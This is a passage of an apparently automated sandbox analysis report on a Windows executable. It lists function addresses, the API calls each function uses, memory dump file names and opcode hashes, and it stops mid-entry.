                                                        • Associated: 00000000.00000002.1639090059.00007FF7F4D9B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1639127214.00007FF7F4DAD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1639127214.00007FF7F4DB6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1639173162.00007FF7F4DCC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1639173162.00007FF7F4E1E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7ff7f4d60000_C792057CB761DA8872421A6C906C4481B260BDB5D27B8.jbxd
                                                        Similarity
                                                        • API ID: DeleteFile$_invalid_parameter_noinfo_noreturn
                                                        • String ID:
                                                        • API String ID: 3118131910-0
                                                        • Opcode ID: 24329dc93e2db74fbf3ff938c648f7867179324972ce2d94c87a74dabcd1ca8b
                                                        • Instruction ID: 509b5aa51c8762e68ded3a291c65f27207c2e99d1ba5464164aef71f58ed9c7f
                                                        • Opcode Fuzzy Hash: 24329dc93e2db74fbf3ff938c648f7867179324972ce2d94c87a74dabcd1ca8b
                                                        • Instruction Fuzzy Hash: B721A922A19B85D3FB10AF26F4D516DB361FB84BD4F900234EBAD42AD5DF2CD5818650
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00007FF7F4D65890 Relevance: 4.6, APIs: 3, Instructions: 57COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1639029163.00007FF7F4D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F4D60000, based on PE: true
                                                        • Associated: 00000000.00000002.1638976721.00007FF7F4D60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1639090059.00007FF7F4D9B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1639127214.00007FF7F4DAD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1639127214.00007FF7F4DB6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1639173162.00007FF7F4DCC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1639173162.00007FF7F4E1E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7ff7f4d60000_C792057CB761DA8872421A6C906C4481B260BDB5D27B8.jbxd
                                                        Similarity
                                                        • API ID: AttributesFile$_invalid_parameter_noinfo_noreturn
                                                        • String ID:
                                                        • API String ID: 1203560049-0
                                                        • Opcode ID: b758bb6361ebbd81519e6b315bcc9c417bc2b8f266a69be79ea9ec31804be294
                                                        • Instruction ID: 48c188ca21aac1e369a3b3be7a267edf0108198034de0a3e507a392f3d42251b
                                                        • Opcode Fuzzy Hash: b758bb6361ebbd81519e6b315bcc9c417bc2b8f266a69be79ea9ec31804be294
                                                        • Instruction Fuzzy Hash: 87213722A18A8593FB10AF15F4D4169B361FB89BA4F900231EBBD437D5DF3CD5418750
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00007FF7F4D8F404 Relevance: 4.5, APIs: 3, Instructions: 19COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1639029163.00007FF7F4D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F4D60000, based on PE: true
                                                        • Associated: 00000000.00000002.1638976721.00007FF7F4D60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1639090059.00007FF7F4D9B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1639127214.00007FF7F4DAD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1639127214.00007FF7F4DB6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1639173162.00007FF7F4DCC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1639173162.00007FF7F4E1E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7ff7f4d60000_C792057CB761DA8872421A6C906C4481B260BDB5D27B8.jbxd
                                                        Similarity
                                                        • API ID: Process$CurrentExitTerminate
                                                        • String ID:
                                                        • API String ID: 1703294689-0
                                                        • Opcode ID: dacd4d28ee892111b3df8d3e8b80cb264a15a7566b0b4340e23d5be73f25a806
                                                        • Instruction ID: 89606d216e9e9134900eca0b4f007ad68a11d38fc3e63d274652f66fb49ce6e7
                                                        • Opcode Fuzzy Hash: dacd4d28ee892111b3df8d3e8b80cb264a15a7566b0b4340e23d5be73f25a806
                                                        • Instruction Fuzzy Hash: 79E01224B0430E83EB04BF26DCC16797352BF44B41F85543DCA2E423D6DE3DA44982E0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00007FF7F4D722B0 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 147COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1639029163.00007FF7F4D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F4D60000, based on PE: true
                                                        • Associated: 00000000.00000002.1638976721.00007FF7F4D60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1639090059.00007FF7F4D9B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1639127214.00007FF7F4DAD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1639127214.00007FF7F4DB6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1639173162.00007FF7F4DCC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1639173162.00007FF7F4E1E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7ff7f4d60000_C792057CB761DA8872421A6C906C4481B260BDB5D27B8.jbxd
                                                        Similarity
                                                        • API ID: _invalid_parameter_noinfo_noreturn
                                                        • String ID: vector too long
                                                        • API String ID: 3668304517-2873823879
                                                        • Opcode ID: 773ab534bfc342007c3e699b05ec78ac80692e862ae6a78e638b037e1d5712e3
                                                        • Instruction ID: dd87c92bd2b7c84343c88244bdebf294bffd8e7dcc57e0a3f8c4b7733d165cbe
                                                        • Opcode Fuzzy Hash: 773ab534bfc342007c3e699b05ec78ac80692e862ae6a78e638b037e1d5712e3
                                                        • Instruction Fuzzy Hash: A761A072A29B8187E700AF62E8C02ADB7A4FB84754F505235EBA907BD5DF3CD490C790
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00007FF7F4D76CF0 Relevance: 3.2, APIs: 2, Instructions: 170COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1639029163.00007FF7F4D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F4D60000, based on PE: true
                                                        • Associated: 00000000.00000002.1638976721.00007FF7F4D60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1639090059.00007FF7F4D9B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1639127214.00007FF7F4DAD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1639127214.00007FF7F4DB6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1639173162.00007FF7F4DCC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1639173162.00007FF7F4E1E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7ff7f4d60000_C792057CB761DA8872421A6C906C4481B260BDB5D27B8.jbxd
                                                        Similarity
                                                        • API ID: _invalid_parameter_noinfo_noreturn
                                                        • String ID:
                                                        • API String ID: 3668304517-0
                                                        • Opcode ID: 87fcb866617abeeb89e036a0e954f0777316bb9ab082f512a64afd7ce57831e1
                                                        • Instruction ID: d794b7b2fb11e39a1e40cf40b4015007fa0ab09aeab5b6a6f344bfef5b2f6990
                                                        • Opcode Fuzzy Hash: 87fcb866617abeeb89e036a0e954f0777316bb9ab082f512a64afd7ce57831e1
                                                        • Instruction Fuzzy Hash: D4717162B25A4686FF10AF66D4C42ACB366BB44BA4F804136DB3D177D5EE3CE441C3A0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00007FF7F4D6491C Relevance: 3.1, APIs: 2, Instructions: 100COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1639029163.00007FF7F4D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F4D60000, based on PE: true
                                                        • Associated: 00000000.00000002.1638976721.00007FF7F4D60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1639090059.00007FF7F4D9B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1639127214.00007FF7F4DAD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1639127214.00007FF7F4DB6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1639173162.00007FF7F4DCC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1639173162.00007FF7F4E1E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7ff7f4d60000_C792057CB761DA8872421A6C906C4481B260BDB5D27B8.jbxd
                                                        Similarity
                                                        • API ID: ErrorFileLastPointer
                                                        • String ID:
                                                        • API String ID: 2976181284-0
                                                        • Opcode ID: afbb24ce4a808c86d9ab97423e5b5b7dbeb16d4b7f73d0bc2ed342d630b90402
                                                        • Instruction ID: a7af5c10d1a9af8614ab60f0ae7a5c6eb9ab964225ee93bc3f90d4dabad44791
                                                        • Opcode Fuzzy Hash: afbb24ce4a808c86d9ab97423e5b5b7dbeb16d4b7f73d0bc2ed342d630b90402
                                                        • Instruction Fuzzy Hash: DD31E422B1A995E3EB60AE1BD5802B9B350BF05BD8F840136DF2D477D4DE2CD48187A4
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00007FF7F4D747B8 Relevance: 3.1, APIs: 2, Instructions: 86COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1639029163.00007FF7F4D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F4D60000, based on PE: true
                                                        • Associated: 00000000.00000002.1638976721.00007FF7F4D60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1639090059.00007FF7F4D9B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1639127214.00007FF7F4DAD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1639127214.00007FF7F4DB6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1639173162.00007FF7F4DCC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1639173162.00007FF7F4E1E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7ff7f4d60000_C792057CB761DA8872421A6C906C4481B260BDB5D27B8.jbxd
                                                        Similarity
                                                        • API ID: _invalid_parameter_noinfo_noreturn$CloseFind
                                                        • String ID:
                                                        • API String ID: 3587649625-0
                                                        • Opcode ID: cd826c2337f1601519bc394ad6d763ba4fbc40158b3eabc1632557615348f84e
                                                        • Instruction ID: 92b873cf5b0da87aad826899394f399a2133c226d6ec03b743b85c1d5dac9336
                                                        • Opcode Fuzzy Hash: cd826c2337f1601519bc394ad6d763ba4fbc40158b3eabc1632557615348f84e
                                                        • Instruction Fuzzy Hash: 7141A322F25B8986FB00AF69D4813ACB362FF457A4F804635DB7C13AD9DE7C94808394
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00007FF7F4D61EBC Relevance: 3.1, APIs: 2, Instructions: 83COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1639029163.00007FF7F4D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F4D60000, based on PE: true
                                                        • Associated: 00000000.00000002.1638976721.00007FF7F4D60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1639090059.00007FF7F4D9B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1639127214.00007FF7F4DAD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1639127214.00007FF7F4DB6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1639173162.00007FF7F4DCC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1639173162.00007FF7F4E1E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7ff7f4d60000_C792057CB761DA8872421A6C906C4481B260BDB5D27B8.jbxd
                                                        Similarity
                                                        • API ID: Item_invalid_parameter_noinfo_noreturn
                                                        • String ID:
                                                        • API String ID: 1746051919-0
                                                        • Opcode ID: 76f313465ef4a37b769d8a49e72558100e414d72335e328d96ea95efa135b55a
                                                        • Instruction ID: 12b819b8218b1082164fc337b343154f06088ded69d392be87ee68fd79193d88
                                                        • Opcode Fuzzy Hash: 76f313465ef4a37b769d8a49e72558100e414d72335e328d96ea95efa135b55a
                                                        • Instruction Fuzzy Hash: 9931C522A19B4597EB10AF16E4853AEF365FB84790F844239E7AC07BD5DF7CE4408790
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00007FF7F4D64C70 Relevance: 3.1, APIs: 2, Instructions: 76timeCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1639029163.00007FF7F4D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F4D60000, based on PE: true
                                                        • Associated: 00000000.00000002.1638976721.00007FF7F4D60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1639090059.00007FF7F4D9B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1639127214.00007FF7F4DAD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1639127214.00007FF7F4DB6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1639173162.00007FF7F4DCC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1639173162.00007FF7F4E1E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7ff7f4d60000_C792057CB761DA8872421A6C906C4481B260BDB5D27B8.jbxd
                                                        Similarity
                                                        • API ID: File$BuffersFlushTime
                                                        • String ID:
                                                        • API String ID: 1392018926-0
                                                        • Opcode ID: a27d225e8ae50b9f2b92a99971c080e0e960c57784bde7d607fa2cb0c93f78b5
                                                        • Instruction ID: 39407c0c0f1729fb74aea864766745059bd1cc137d49f532317eae5fae150f09
                                                        • Opcode Fuzzy Hash: a27d225e8ae50b9f2b92a99971c080e0e960c57784bde7d607fa2cb0c93f78b5
                                                        • Instruction Fuzzy Hash: 3A21BF22A09E46E2EB61AF53D4803B6B690AF41794F964231CF5C023D1EE3CD4D6C294
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00007FF7F4D6AEE0 Relevance: 3.1, APIs: 2, Instructions: 52COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1639029163.00007FF7F4D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F4D60000, based on PE: true
                                                        • Associated: 00000000.00000002.1638976721.00007FF7F4D60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1639090059.00007FF7F4D9B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1639127214.00007FF7F4DAD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1639127214.00007FF7F4DB6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1639173162.00007FF7F4DCC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1639173162.00007FF7F4E1E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7ff7f4d60000_C792057CB761DA8872421A6C906C4481B260BDB5D27B8.jbxd
                                                        Similarity
                                                        • API ID: LoadString
                                                        • String ID:
                                                        • API String ID: 2948472770-0
                                                        • Opcode ID: dedc9b699e454723cd5290fbfd2bbed97dba7cc30504e392eb1ac5c410963244
                                                        • Instruction ID: 4ac0dcff30a81aa79c0920c414d0098870d6642049a0a4e11810c260e445fbc2
                                                        • Opcode Fuzzy Hash: dedc9b699e454723cd5290fbfd2bbed97dba7cc30504e392eb1ac5c410963244
                                                        • Instruction Fuzzy Hash: B9116765B18A0187E714AF0BE884168F7A1EB89FC0BD4443ADB6C833A1EF3CE54183D4
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00007FF7F4D64D50 Relevance: 3.0, APIs: 2, Instructions: 47COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1639029163.00007FF7F4D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F4D60000, based on PE: true
                                                        • Associated: 00000000.00000002.1638976721.00007FF7F4D60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1639090059.00007FF7F4D9B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1639127214.00007FF7F4DAD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1639127214.00007FF7F4DB6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1639173162.00007FF7F4DCC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1639173162.00007FF7F4E1E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7ff7f4d60000_C792057CB761DA8872421A6C906C4481B260BDB5D27B8.jbxd
                                                        Similarity
                                                        • API ID: ErrorFileLastPointer
                                                        • String ID:
                                                        • API String ID: 2976181284-0
                                                        • Opcode ID: f476d2bfd4726034d9589a57a35db9820aa07498a5a105237817cbeb34648ff6
                                                        • Instruction ID: 02ecd6ea22298426a60d70e65d3be3ad028157dbc0d4012c26cacee36eaf13e9
                                                        • Opcode Fuzzy Hash: f476d2bfd4726034d9589a57a35db9820aa07498a5a105237817cbeb34648ff6
                                                        • Instruction Fuzzy Hash: 89119621E18A41E3E760AF26E4C0279B360FB44B64F944331EB3D522D5DF2CD496C790
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00007FF7F4D6215C Relevance: 3.0, APIs: 2, Instructions: 37COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1639029163.00007FF7F4D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F4D60000, based on PE: true
                                                        • Associated: 00000000.00000002.1638976721.00007FF7F4D60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1639090059.00007FF7F4D9B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1639127214.00007FF7F4DAD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1639127214.00007FF7F4DB6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1639173162.00007FF7F4DCC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1639173162.00007FF7F4E1E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7ff7f4d60000_C792057CB761DA8872421A6C906C4481B260BDB5D27B8.jbxd
                                                        Similarity
                                                        • API ID: Item$RectText$ClientWindowswprintf
                                                        • String ID:
                                                        • API String ID: 402765569-0
                                                        • Opcode ID: 7b1a7923946a01b82bc000e866a5e8131c4a3fcb45aa136cf21fa47d66a637f8
                                                        • Instruction ID: 0c1f3843bec81895ab9723fc35822beaa8d349d7e21659096a1356ee704a5225
                                                        • Opcode Fuzzy Hash: 7b1a7923946a01b82bc000e866a5e8131c4a3fcb45aa136cf21fa47d66a637f8
                                                        • Instruction Fuzzy Hash: 2D015B10E0D64A93FB197F93E4842B8F391AF85740F880434CF6D066D99E2CA58987A0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00007FF7F4D85AA0 Relevance: 3.0, APIs: 2, Instructions: 21COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1639029163.00007FF7F4D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F4D60000, based on PE: true
                                                        • Associated: 00000000.00000002.1638976721.00007FF7F4D60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1639090059.00007FF7F4D9B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1639127214.00007FF7F4DAD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1639127214.00007FF7F4DB6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1639173162.00007FF7F4DCC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1639173162.00007FF7F4E1E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7ff7f4d60000_C792057CB761DA8872421A6C906C4481B260BDB5D27B8.jbxd
                                                        Similarity
                                                        • API ID: Concurrency::cancel_current_task$std::bad_alloc::bad_alloc
                                                        • String ID:
                                                        • API String ID: 1173176844-0
                                                        • Opcode ID: cb70070fe48f3c89f628de0cdadc618a77b9ee77caa0e306cad7b983c922d0b7
                                                        • Instruction ID: 549a4d081f20caf16fbaeae48a86dd4f5345ce560b2e21a4d21f5c9fa43dfdc7
                                                        • Opcode Fuzzy Hash: cb70070fe48f3c89f628de0cdadc618a77b9ee77caa0e306cad7b983c922d0b7
                                                        • Instruction Fuzzy Hash: ADE0B610E1A10B4BFF583B6398E51B8A1446F19374FAC1B30DB3D052C2AD1CB45541F1
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00007FF7F4D90DDC Relevance: 3.0, APIs: 2, Instructions: 19threadCOMMONLIBRARYCODE
                                                        Download Yara Rule
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1639029163.00007FF7F4D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F4D60000, based on PE: true
                                                        • Associated: 00000000.00000002.1638976721.00007FF7F4D60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1639090059.00007FF7F4D9B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1639127214.00007FF7F4DAD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1639127214.00007FF7F4DB6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1639173162.00007FF7F4DCC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1639173162.00007FF7F4E1E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7ff7f4d60000_C792057CB761DA8872421A6C906C4481B260BDB5D27B8.jbxd
                                                        Similarity
                                                        • API ID: ErrorLanguagesLastPreferredRestoreThread
                                                        • String ID:
                                                        • API String ID: 588628887-0
                                                        • Opcode ID: cb26b9ff4c5950cca95b314f348e089e992c2abfe0e8eb9b732e5839e685e898
                                                        • Instruction ID: 0f2a693fdf4583f04e50de0a1ec869b89f6d55a230cc1dbd41a3fa02c8673eab
                                                        • Opcode Fuzzy Hash: cb26b9ff4c5950cca95b314f348e089e992c2abfe0e8eb9b732e5839e685e898
                                                        • Instruction Fuzzy Hash: 0CE01211E0A20B43FF5ABFB3EC85074B2906F58B41B844034CA2D862E2EE2CE49182E0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00007FF7F4D74A60 Relevance: 1.7, APIs: 1, Instructions: 194COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1639029163.00007FF7F4D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F4D60000, based on PE: true
                                                        • Associated: 00000000.00000002.1638976721.00007FF7F4D60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1639090059.00007FF7F4D9B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1639127214.00007FF7F4DAD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1639127214.00007FF7F4DB6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1639173162.00007FF7F4DCC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1639173162.00007FF7F4E1E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7ff7f4d60000_C792057CB761DA8872421A6C906C4481B260BDB5D27B8.jbxd
                                                        Similarity
                                                        • API ID: _invalid_parameter_noinfo_noreturn
                                                        • String ID:
                                                        • API String ID: 3668304517-0
                                                        • Opcode ID: 7113b48dc831b58321a560a1d3291e807c508c5f25059263f6d99c50da7011ba
                                                        • Instruction ID: 66d50a611a3a8e851d7f50514978192babbc10445e868b17c966a6db3cbb3aa9
                                                        • Opcode Fuzzy Hash: 7113b48dc831b58321a560a1d3291e807c508c5f25059263f6d99c50da7011ba
                                                        • Instruction Fuzzy Hash: 6C717161F2865247FB15EF66D8D42BDB261BF44794F904132DF3E426D9DE2CA48182A0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00007FF7F4D79A30 Relevance: 1.6, APIs: 1, Instructions: 143COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1639029163.00007FF7F4D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F4D60000, based on PE: true
                                                        • Associated: 00000000.00000002.1638976721.00007FF7F4D60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1639090059.00007FF7F4D9B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1639127214.00007FF7F4DAD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1639127214.00007FF7F4DB6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1639173162.00007FF7F4DCC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1639173162.00007FF7F4E1E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7ff7f4d60000_C792057CB761DA8872421A6C906C4481B260BDB5D27B8.jbxd
                                                        Similarity
                                                        • API ID: _invalid_parameter_noinfo_noreturn
                                                        • String ID:
                                                        • API String ID: 3668304517-0
                                                        • Opcode ID: bcc7c11c859e78f1b5b88835af9d939d58a18097feacef3591c313feb19c39b6
                                                        • Instruction ID: 38716634ea6afa0bad149a02c212f23f5ded71aff52e3d9c8e3d3aa70e5dbd50
                                                        • Opcode Fuzzy Hash: bcc7c11c859e78f1b5b88835af9d939d58a18097feacef3591c313feb19c39b6
                                                        • Instruction Fuzzy Hash: 6E616862A1C68742FB64BF16E8D52F9B250FF84748FC04135DBAD426E5DE7CE48086A0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00007FF7F4D6552C Relevance: 1.6, APIs: 1, Instructions: 100COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Memory Dump Source
